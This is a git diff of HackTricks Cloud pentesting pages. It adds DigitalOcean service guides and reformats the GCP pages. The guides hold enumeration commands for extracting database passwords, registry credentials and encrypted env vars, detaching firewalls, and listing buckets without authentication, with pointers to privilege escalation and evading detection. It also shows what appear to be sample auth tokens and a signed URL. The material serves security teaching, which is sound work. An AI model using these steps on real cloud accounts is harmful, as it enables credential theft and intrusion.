+[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
+
+You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
+
+When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
+
+An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
+
+### Enumeration
+
+```bash
+doctl apps list # You should get URLs here
+doctl apps spec get  # Get yaml (including env vars, might be encrypted)
+doctl apps logs  # Get HTTP logs
+doctl apps list-alerts  # Get alerts
+doctl apps list-regions # Get available regions and the default one
+```
+
+> [!CAUTION]
+> **Apps doesn't have metadata endpoint**
+
+### RCE & Encrypted env vars
+
+To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**.
+
+That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
new file mode 100644
index 000000000..964b0cf0c
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
@@ -0,0 +1,33 @@
+# DO - Container Registry
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker.
+
+When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters.
+
+### Connection
+
+```bash
+# Using doctl
+doctl registry login
+
+# Using docker (You need an API token, use it as username and as password)
+docker login registry.digitalocean.com
+Username: 
+Password: 
+```
+
+### Enumeration
+
+```bash
+# Get creds to access the registry from the API
+doctl registry docker-config
+
+# List
+doctl registry repository list-v2
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
new file mode 100644
index 000000000..99d1d96f9
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
@@ -0,0 +1,43 @@
+# DO - Databases
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites.
+
+### Connections details
+
+When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one).
+
+The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely.
+
+```bash
+sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
+```
+
+### Enumeration
+
+```bash
+# Databse clusters
+doctl databases list
+
+# Auth
+doctl databases get  # This shows the URL with CREDENTIALS to access
+doctl databases connection  # Another way to egt credentials
+doctl databases user list  # Get all usernames and passwords
+
+# Dbs inside a database cluster
+doctl databases db list 
+
+# Firewall (allowed IPs), you can also add
+doctl databases firewalls list 
+
+# Backups
+doctl databases backups  # List backups of DB
+
+# Pools
+doctl databases pool list  # List pools of DB
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
similarity index 57%
rename from pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
rename to src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
index b1cb6a795..bb4798592 100644
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
@@ -1,19 +1,6 @@
 # DO - Droplets
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -45,15 +32,14 @@ For authentication it's possible to **enable SSH** through username and **passwo
 
 ### Firewall
 
-{% hint style="danger" %}
-By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
-{% endhint %}
+> [!CAUTION]
+> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
 
 More info in:
 
-{% content-ref url="do-networking.md" %}
-[do-networking.md](do-networking.md)
-{% endcontent-ref %}
+{{#ref}}
+do-networking.md
+{{#endref}}
 
 ### Enumeration
 
@@ -83,9 +69,8 @@ doctl compute certificate list
 doctl compute snapshot list
 ```
 
-{% hint style="danger" %}
-**Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP.
-{% endhint %}
+> [!CAUTION]
+> **Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP.
 
 ### RCE
 
@@ -93,17 +78,4 @@ With access to the console it's possible to **get a shell inside the droplet** a
 
 It's also possible to launch a **recovery console** to run commands inside the host accessing a recovery console in **`https://cloud.digitalocean.com/droplets//console`**(but in this case you will need to know the root password).
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
new file mode 100644
index 000000000..c167d4ffa
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
@@ -0,0 +1,60 @@
+# DO - Functions
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance.
+
+In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\
+Inside the namespace you can then create a function.
+
+### Triggers
+
+The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
+
+```bash
+curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
+```
+
+To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:**
+
+```bash
+doctl serverless connect --trace
+```
+
+**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**.
+
+> [!CAUTION]
+> In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\
+> I couldn't find any way to read them from the CLI but from the console it's straight forward.
+
+**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/`
+
+### Enumeration
+
+```bash
+# Namespace
+doctl serverless namespaces list
+
+# Functions (need to connect to a namespace)
+doctl serverless connect
+doctl serverless functions list
+doctl serverless functions invoke 
+doctl serverless functions get 
+
+# Logs of executions
+doctl serverless activations list
+doctl serverless activations get  # Get all the info about execution
+doctl serverless activations logs  # get only the logs of execution
+doctl serverless activations result  # get only the response result of execution
+
+# I couldn't find any way to get the env variables form the CLI
+```
+
+> [!CAUTION]
+> There **isn't metadata endpoint** from the Functions sandbox.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
new file mode 100644
index 000000000..b816a1c13
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
@@ -0,0 +1,19 @@
+# DO - Images
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need.
+
+DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community.
+
+When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future.
+
+### Enumeration
+
+```
+doctl compute image list
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
new file mode 100644
index 000000000..34ed44fb9
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
@@ -0,0 +1,39 @@
+# DO - Kubernetes (DOKS)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+### DigitalOcean Kubernetes (DOKS)
+
+DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include:
+
+1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters.
+2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters.
+3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage.
+4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date.
+
+### Connection
+
+```bash
+# Generate kubeconfig from doctl
+doctl kubernetes cluster kubeconfig save 
+
+# Use a kubeconfig file that you can download from the console
+kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes
+```
+
+### Enumeration
+
+```bash
+# Get clusters
+doctl kubernetes cluster list
+
+# Get node pool of cluster (number of nodes)
+doctl kubernetes cluster node-pool list 
+
+# Get DO resources used by the cluster
+doctl kubernetes cluster list-associated-resources 
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
new file mode 100644
index 000000000..c6bf58b8d
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
@@ -0,0 +1,45 @@
+# DO - Networking
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Domains
+
+```bash
+doctl compute domain list
+doctl compute domain records list 
+# You can also create records
+```
+
+### Reserverd IPs
+
+```bash
+doctl compute reserved-ip list
+doctl compute reserved-ip-action unassign 
+```
+
+### Load Balancers
+
+```bash
+doctl compute load-balancer list
+doctl compute load-balancer remove-droplets  --droplet-ids 12,33
+doctl compute load-balancer add-forwarding-rules  --forwarding-rules entry_protocol:tcp,entry_port:3306,...
+```
+
+### VPC
+
+```
+doctl vpcs list
+```
+
+### Firewall
+
+> [!CAUTION]
+> By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
+
+```bash
+doctl compute firewall list
+doctl compute firewall list-by-droplet 
+doctl compute firewall remove-droplets  --droplet-ids 
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
new file mode 100644
index 000000000..9c164f747
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
@@ -0,0 +1,23 @@
+# DO - Projects
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
+> For more info check:
+
+{{#ref}}
+../do-basic-information.md
+{{#endref}}
+
+### Enumeration
+
+It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily:
+
+```bash
+doctl projects list # Get projects
+doctl projects resources list  # Get all the resources of a project
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
new file mode 100644
index 000000000..bbb985e64
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
@@ -0,0 +1,46 @@
+# DO - Spaces
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers.
+
+### Access
+
+Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space.
+
+A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
+Note the **region** as **subdomain**.
+
+Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials).
+
+However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time:
+
+

+
+### Enumeration
+
+```bash
+# Unauthenticated
+## Note how the region is specified in the endpoint
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname
+
+# Authenticated
+## Configure spaces keys as AWS credentials
+aws configure
+AWS Access Key ID [None]: 
+AWS Secret Access Key [None]: 
+Default region name [None]:
+Default output format [None]:
+
+## List all buckets in a region
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com
+
+## List files inside a bucket
+aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname
+
+## It's also possible to generate authorized access to buckets from the API
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
new file mode 100644
index 000000000..95041a406
--- /dev/null
+++ b/src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
@@ -0,0 +1,15 @@
+# DO - Volumes
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups.
+
+### Enumeration
+
+```
+compute volume list
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/README.md b/src/pentesting-cloud/gcp-security/README.md
similarity index 55%
rename from pentesting-cloud/gcp-security/README.md
rename to src/pentesting-cloud/gcp-security/README.md
index 5cf35ed29..1b74bb6b0 100644
--- a/pentesting-cloud/gcp-security/README.md
+++ b/src/pentesting-cloud/gcp-security/README.md
@@ -1,19 +1,6 @@
 # GCP Pentesting
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,16 +8,16 @@ Learn & practice GCP Hacking:  [!NOTE]
+> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
 
 ## Basic Enumeration
 
@@ -71,13 +57,14 @@ After you have managed to obtain credentials, you need to know **to who do those
 
 For more information about how to **enumerate GCP metadata** check the following hacktricks page:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440
+{{#endref}}
 
 ### Whoami
 
 In GCP you can try several options to try to guess who you are:
 
-{% code overflow="wrap" %}
 ```bash
 #If you are inside a compromise machine
 gcloud auth list
@@ -87,17 +74,14 @@ gcloud auth print-identity-token #Get info from the token
 #If you compromised a metadata token or somehow found an OAuth token
 curl -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=" https://www.googleapis.com/oauth2/v1/tokeninfo
 ```
-{% endcode %}
 
 You can also use the API endpoint `/userinfo` to get more info about the user:
 
-{% code overflow="wrap" %}
 ```bash
 curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth $(gcloud auth print-access-token)" https://www.googleapis.com/oauth2/v1/userinfo
 
 curl -H "Content-Type: application/x-www-form-urlencoded" -H "Authorization: OAuth " https://www.googleapis.com/oauth2/v1/userinfo
 ```
-{% endcode %}
 
 ### Org Enumeration
 
@@ -115,30 +99,29 @@ If you have enough permissions, **checking the privileges of each entity inside
 If you don't have enough permissions to enumerate IAM, you can **steal brute-force them** to figure them out.\
 Check **how to do the numeration and brute-forcing** in:
 
-{% content-ref url="gcp-services/gcp-iam-and-org-policies-enum.md" %}
-[gcp-iam-and-org-policies-enum.md](gcp-services/gcp-iam-and-org-policies-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
 
-{% hint style="info" %}
-Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-In the following section you can check some ways to **enumerate some common services.**
-{% endhint %}
+> [!NOTE]
+> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
+> In the following section you can check some ways to **enumerate some common services.**
 
 ## Services Enumeration
 
 GCP has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets, how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them:
 
-{% content-ref url="gcp-services/" %}
-[gcp-services](gcp-services/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-services/
+{{#endref}}
 
 Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automatic-tools).
 
 Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them:
 
-{% content-ref url="gcp-unauthenticated-enum-and-access/" %}
-[gcp-unauthenticated-enum-and-access](gcp-unauthenticated-enum-and-access/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-unauthenticated-enum-and-access/
+{{#endref}}
 
 ## Privilege Escalation, Post Exploitation & Persistence
 
@@ -146,17 +129,17 @@ The most common way once you have obtained some cloud credentials or have compro
 
 Moreover, during this enumeration, remember that **permissions can be set at the highest level of "Organization"** as well.
 
-{% content-ref url="gcp-privilege-escalation/" %}
-[gcp-privilege-escalation](gcp-privilege-escalation/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-privilege-escalation/
+{{#endref}}
 
-{% content-ref url="gcp-post-exploitation/" %}
-[gcp-post-exploitation](gcp-post-exploitation/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-post-exploitation/
+{{#endref}}
 
-{% content-ref url="gcp-persistence/" %}
-[gcp-persistence](gcp-persistence/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-persistence/
+{{#endref}}
 
 ### Publicly Exposed Services
 
@@ -165,22 +148,24 @@ As pentester/red teamer you should always check if you can find **sensitive info
 
 In this book you should find **information** about how to find **exposed GCP services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in:
 
-{% embed url="https://book.hacktricks.xyz/" %}
+{{#ref}}
+https://book.hacktricks.xyz/
+{{#endref}}
 
 ## GCP <--> Workspace Pivoting
 
 **Compromising** principals in **one** platform might allow an attacker to **compromise the other one**, check it in:
 
-{% content-ref url="gcp-to-workspace-pivoting/" %}
-[gcp-to-workspace-pivoting](gcp-to-workspace-pivoting/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-to-workspace-pivoting/
+{{#endref}}
 
 ## Automatic Tools
 
-* In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.
-  * Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
-* Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md).
-* [**gcp\_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.
+- In the **GCloud console**, in [https://console.cloud.google.com/iam-admin/asset-inventory/dashboard](https://console.cloud.google.com/iam-admin/asset-inventory/dashboard) you can see resources and IAMs being used by project.
+  - Here you can see the assets supported by this API: [https://cloud.google.com/asset-inventory/docs/supported-asset-types](https://cloud.google.com/asset-inventory/docs/supported-asset-types)
+- Check **tools** that can be [**used in several clouds here**](../pentesting-cloud-methodology.md).
+- [**gcp_scanner**](https://github.com/google/gcp_scanner): This is a GCP resource scanner that can help determine what **level of access certain credentials posses** on GCP.
 
 ```bash
 # Install
@@ -193,9 +178,9 @@ pip install -r requirements.txt
 python3 __main__.py -o /tmp/output/ -g "$HOME/.config/gcloud"
 ```
 
-* [**gcp\_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.
-* [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script).
-* [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.
+- [**gcp_enum**](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gcp_enum): Bash script to enumerate a GCP environment using gcloud cli and saving the results in a file.
+- [**GCP-IAM-Privilege-Escalation**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation): Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script).
+- [**BF My GCP Permissions**](https://github.com/carlospolop/bf_my_gcp_permissions): Script to bruteforce your permissions.
 
 ## gcloud config & debug
 
@@ -255,19 +240,6 @@ gcloud config unset auth/access_token_file
 
 ## References
 
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/README.md b/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
similarity index 73%
rename from pentesting-cloud/gcp-security/gcp-basic-information/README.md
rename to src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
index 4adbc2a48..890c5d03b 100644
--- a/pentesting-cloud/gcp-security/gcp-basic-information/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-basic-information/README.md
@@ -1,19 +1,6 @@
 # GCP - Basic Information
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## **Resource hierarchy**
 
@@ -30,7 +17,7 @@ Organization
 
 A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
 
-
https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg

+
https://cloud.google.com/static/resource-manager/img/cloud-hierarchy.svg

 
 ## **Projects Migration**
 
@@ -40,24 +27,24 @@ It's possible to **migrate a project without any organization** to an organizati
 
 Allow to centralize control over your organization's cloud resources:
 
-* Centralize control to **configure restrictions** on how your organization’s resources can be used.
-* Define and establish **guardrails** for your development teams to stay within compliance boundaries.
-* Help project owners and their teams move quickly without worry of breaking compliance.
+- Centralize control to **configure restrictions** on how your organization’s resources can be used.
+- Define and establish **guardrails** for your development teams to stay within compliance boundaries.
+- Help project owners and their teams move quickly without worry of breaking compliance.
 
 These policies can be created to **affect the complete organization, folder(s) or project(s)**. Descendants of the targeted resource hierarchy node **inherit the organization policy**.
 
 In order to **define** an organization policy, **you choose a** [**constraint**](https://cloud.google.com/resource-manager/docs/organization-policy/overview#constraints), which is a particular type of restriction against either a Google Cloud service or a group of Google Cloud services. You **configure that constraint with your desired restrictions**.
 
-
https://cloud.google.com/resource-manager/img/org-policy-concepts.svg

+
